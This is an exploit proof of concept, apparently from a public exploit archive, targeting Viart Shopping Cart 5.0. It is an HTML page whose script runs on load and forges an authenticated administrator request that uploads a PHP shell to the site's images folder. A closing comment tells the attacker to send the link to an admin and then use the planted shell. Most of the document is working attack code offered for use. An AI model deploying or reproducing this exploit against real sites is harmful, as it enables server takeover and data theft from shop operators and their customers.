<!--
# Exploit Title : Viart Shopping Cart 5.0 CSRF Shell Upload Vulnerability
# Date : 2016/06/12
# Google Dork : Script-Kiddie ;)
# Exploit Author : Ali Ghanbari
# Vendor Homepage : http://www.viart.com/
# Software Link : http://www.viart.com/php_shopping_cart_free_evaluation_download.html
# Version : 5.0
#POC
-->
<html>
<body onload="submitRequest();">
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/admin/admin_fm_upload_files.php", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------256672629917035");
xhr.withCredentials = "true";
var body = "-----------------------------256672629917035\r\n" +
"Content-Disposition: form-data; name=\"dir_root\"\r\n" +
"\r\n" +
"../images\r\n" +
"-----------------------------256672629917035\r\n" +
"Content-Disposition: form-data; name=\"newfile_0\"; filename=\"[shell.php]\"\r\n" +
"Content-Type: application/x-php\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------256672629917035--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
</body>
</html>
<!--
#Desc:
upload exploit code in your host and send link to admin when admin click on link, you can
access to your shell from below path :
http://localhost/images/[your shell]
####################################
[+]Exploit by: Ali Ghanbari
[+]My Telegram :@Exploiter007
-->
